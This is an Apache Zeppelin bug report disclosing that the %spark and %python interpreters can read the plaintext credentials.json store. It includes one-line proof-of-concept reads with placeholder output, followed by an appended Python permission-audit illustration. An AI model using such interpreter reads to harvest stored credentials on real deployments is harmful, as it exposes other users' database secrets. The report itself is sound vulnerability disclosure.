Dmitry Zhukov created ZEPPELIN-1497:
---------------------------------------
Summary: %spark and %python interpreters are able to read credentials.json file
Key: ZEPPELIN-1497
URL: https://issues.apache.org/jira/browse/ZEPPELIN-1497
Project: Zeppelin
Issue Type: Bug
Affects Versions: 0.6.1
Reporter: Dmitry Zhukov
Currently DB credentials for all users are stored in a plain text file on disk.
This file is readable by any interpreter capable of running arbitrary code with
Zeppelin user privileges, e.g. %python or %spark.
{code}
%spark
scala.io.Source.fromFile("/home/ubuntu/zeppelin-0.6.1-bin-netinst/conf/credentials.json").mkString
{code}
{noformat}
res6: String =
{
"credentialsMap": {
"anonymous": {
"userCredentials": {
"testdb": {
"username": "user",
"password": "pass"
}
}
}
}
}
{noformat}
{code}
%python
open("/home/ubuntu/zeppelin-0.6.1-bin-netinst/conf/credentials.json", 'r').read()
{code}
{noformat}
'{\n "credentialsMap": {\n "anonymous": {\n "userCredentials": {\n
"testdb": {\n "username": "user",\n "password": "pass"\n
}\n }\n }\n }\n}'
{noformat}
Basically if one has %python or %spark interpreters enabled it makes the whole
credentials store useless and even dangerous.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
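Added illustration, not part of the issue text or of Zeppelin's own code: a small Python audit that parses the credentials.json layout shown in the report and applies the standard POSIX read check, making the point of the bug concrete: while %python/%spark run as the same user that owns conf/credentials.json, no file mode keeps the store out of their reach. The uids and the sample file content are constructed.

```python
import json
import stat
from typing import Dict, List, Set

# Constructed sample mirroring the credentials.json layout quoted in the issue.
SAMPLE_CREDENTIALS_JSON = """{
  "credentialsMap": {
    "anonymous": {
      "userCredentials": {
        "testdb": {"username": "user", "password": "pass"}
      }
    }
  }
}"""


def list_plaintext_entries(raw_json: str) -> List[Dict[str, object]]:
    """One record per stored credential (owner, entity, username); the password itself is never echoed."""
    store = json.loads(raw_json)
    entries: List[Dict[str, object]] = []
    for owner, block in store.get("credentialsMap", {}).items():
        for entity, cred in block.get("userCredentials", {}).items():
            entries.append({
                "owner": owner,
                "entity": entity,
                "username": cred.get("username", ""),
                "has_plaintext_password": bool(cred.get("password")),
            })
    return entries


def readable_by(mode: int, file_uid: int, file_gid: int, uid: int, gids: Set[int]) -> bool:
    """POSIX DAC check: can a process running as (uid, gids) read a file with this mode and owner?"""
    if uid == 0:
        return True                      # root bypasses mode bits
    if uid == file_uid:
        return bool(mode & stat.S_IRUSR)  # owner class: 0600 still grants read
    if file_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


if __name__ == "__main__":
    zeppelin_uid = 1000                  # constructed: user that owns conf/credentials.json
    for interp_uid in (1000, 1001):      # interpreter as same user vs. a separate account
        exposed = readable_by(0o600, zeppelin_uid, zeppelin_uid, interp_uid, {interp_uid})
        print(f"mode 0600, interpreter uid {interp_uid}: readable={exposed}")
    for e in list_plaintext_entries(SAMPLE_CREDENTIALS_JSON):
        print(f"{e['owner']}/{e['entity']}: user={e['username']} plaintext={e['has_plaintext_password']}")
```

Running it shows the same 0600 file reported readable for uid 1000 and unreadable for uid 1001, which is why the fix has to separate the interpreter process identity from the file owner (or stop keeping the secrets in plaintext) rather than tighten permissions.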